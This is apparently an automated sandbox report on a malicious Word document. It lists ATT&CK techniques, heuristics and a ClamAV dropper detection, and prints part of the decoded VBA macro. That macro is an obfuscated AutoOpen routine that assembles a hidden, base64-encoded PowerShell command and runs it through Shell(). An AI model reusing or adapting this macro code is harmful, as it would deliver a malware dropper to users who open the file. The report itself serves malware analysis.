Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The Autoopen macro runs when the document is opened and calls the LnHfVTJFP function, which uses Shell() to execute a command string, likely to download and execute a second-stage payload. The ClamAV detection corroborates the malicious verdict.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6565825-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6565825-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18601 bytes |

SHA-256: bc116e7d42a2baa47e8868828169bf244a0c568966789eafd2c7d580c0405d8f
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "HKcqvGlswc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YbTCOY()
On Error Resume Next
HWMBI = Atn(86919 * CInt(4158) + 69176 - 72694)
FkLnFR = 83156 + _
Log(7138) - iBYPE / Atn(68906) / kMwhQ / ptifv
mzlWA = Atn(61999 * CInt(62137) + 53328 - 84434)
afCip = 74969 + _
Log(98635) - HIRFIp / Atn(71362) / QwuRJ / VURYzi
YbTCOY = zDCNjrr + snpESIqq + JBuanwGFZj + FAZtJsC + AIuAIBkPdJ + DWsiSGDswG + wAPqzVUOv + JhZuLLErNF + GLToSipOh
jXILY = Atn(72885 * CInt(37050) + 59442 - 66106)
CuvXn = 10939 + _
Log(63666) - vlwPjj / Atn(50180) / zJiQR / UKYkJu
End Function
Sub Autoopen()
On Error Resume Next
ERYhds = Atn(45236 * CInt(27887) + 5422 - 67027)
kjBtb = 37095 + _
Log(77690) - lVmJwR / Atn(4359) / ZkzCw / HrTXiG
LnHfVTJFP (YbTCOY)
CowaUj = Atn(70631 * CInt(77056) + 52889 - 66679)
whJOR = 15881 + _
Log(55374) - ajzdD / Atn(62867) / zZKZE / inihpi
End Sub
Function LnHfVTJFP(KIQLHl)
On Error Resume Next
kRYwCu = Atn(10880 * CInt(28252) + 57701 - 86414)
LuRfI = 8968 + _
Log(20362) - uCjLdB / Atn(58026) / Ouahc / AfJHz
TGoYwM = izWsG + Chr(vbKeyP) + NqppzcKoD
IbDTjk = Atn(27443 * CInt(19060) + 38058 - 5142)
dWvoaB = 11583 + _
Log(89696) - XarUDL / Atn(93657) / tlWAEi / TwQftn
SAfVcXC = JcLLHV + Shell(bmIjLlXEXXM + TGoYwM + bwUcUP + KIQLHl + WYSqXKzIjd, vbHide)
zLPwL = Atn(64103 * CInt(70887) + 51293 - 58452)
MDDij = 67851 + _
Log(30601) - ncQij / Atn(59192) / nKVbl / BIDafE
End Function
Attribute VB_Name = "APATHSnB"
Function zDCNjrr()
On Error Resume Next
djlaLb = Atn(10789 * CInt(37768) + 59365 - 36903)
ZiGHFs = 62185 + _
Log(87455) - ZRllhQ / Atn(90765) / tojSzt / iBlXt
MIJErPcJcB = "owersHeLL -Wi" + "nDowsTyle h" + "idden " + "-e KAAoACgAIg" + "B7ADYA" + "NwB9AHsANQ" + "AwAH0Aew" + "A5ADEAfQ" + "B7ADEAMgAzAH0" + "AewAy"
Nwqblz = Atn(12351 * CInt(81834) + 32181 - 85918)
TRVMu = 1586 + _
Log(86336) - jUaqmW / Atn(53432) / tZEGJA / LUuJv
KwIzwK = "ADcAfQB7AD" + "YANgB9AHsANQA5A" + "H0AewAxADEAOAB9" + "AHsANAA2AH0Ae" + "wAxADEANQB9AHs" + "ANQAzAH0Ae"
oucwa = Atn(97544 * CInt(62255) + 45014 - 1986)
AscMdn = 13283 + _
Log(7919) - JOMRM / Atn(72992) / TQKrzr / drawtM
YHTuldmvC = "wAxADQAfQB7AD" + "IAfQB7ADU" + "ANgB9AHsAOQA4" + "AH0Ae" + "wAxADEANA"
vNslD = Atn(26791 * CInt(63363) + 76817 - 45214)
NqElC = 54127 + _
Log(55506) - KdfPN / Atn(17900) / JvwUCp / rjOAT
zCPMVlcZfS = "B9AHsAMgA2A" + "H0AewAxAD" + "AANgB9AHsANgA" + "yAH0AewA4A" + "DYAfQB7ADIA" + "OQB9AHsANAAxAH"
IYQftl = Atn(58074 * CInt(18169) + 73834 - 22790)
Pzijjt = 60990 + _
Log(662) - zuSiTV / Atn(67646) / wYWCI / HmMzWb
DiirthZCij = "0AewAzAH0Ae" + "wAyAD" + "EAfQB7" + "ADEAOAB9AHs" + "AMgAwAH0Ae" + "wA0ADkAfQB" + "7ADMA"
iWjXFE = Atn(13642 * CInt(55881) + 16134 - 75559)
AkiNFh = 23811 + _
Log(46045) - dKNoY / Atn(14119) / azWtJ / ETXiL
dzWhzDWRKvt = "MQB9AH" + "sANwAyAH0AewAxA" + "DAANQ" + "B9AHsAMwA3AH"
QcXql = Atn(77228 * CInt(3697) + 45856 - 28627)
jfnwYB = 37920 + _
Log(17358) - wzDjfl / Atn(88222) / bjOqW / wHaGU
jMDFfdBi = "0AewA1AH0AewAx" + "ADMAfQB" + "7ADEAMg" + "A0AH0A" + "ewAxADEAMQB9" + "AHsANwA1A" + "H0AewAxADA" + "ANwB9AHsAMQA" + "yAH0Aew"
AWjljR = Atn(83474 * CInt(11856) + 20365 - 99916)
zOoMQ = 25441 + _
Log(91460) - ErOarA / Atn(6770) / Iorwv / jucORz
JkRqV = "A0ADAA" + "fQB7ADkAMAB9AH" + "sANwA3AH0AewA2" + "AH0AewAxA" + "DEAOQ" + "B9AHsAMgAyAH" + "0AewAxADAANAB9" + "AHsAOQA3AH" + "0AewAxA" + "DAAMwB"
unPbd = Atn(29375 * CInt(52612) + 65872 - 19555)
tiNPlm = 92755 + _
Log(84103) - dHiRTB / Atn(14051) / iukBv / iKDzwO
YIdCzTYT = "9AHsANAA" + "1AH0AewA" + "2ADEAfQB7AD" + "cAOAB9AHsAMQ" + "A3AH0AewAzADY" + "AfQB7AD"
zDCNjrr = MIJErPcJcB + KwIzwK + YHTuldmvC + zCPMVlcZfS + DiirthZCij + dzWhzDWRKvt + jMDFfdBi + JkRqV + YIdCzTYT
End Function
Function snpESIqq()
On Error Resume Next
cbwGzT = Atn(64872 * CInt(68895) + 91162 - 15020)
WfWHLW = 92192 ... (truncated)
```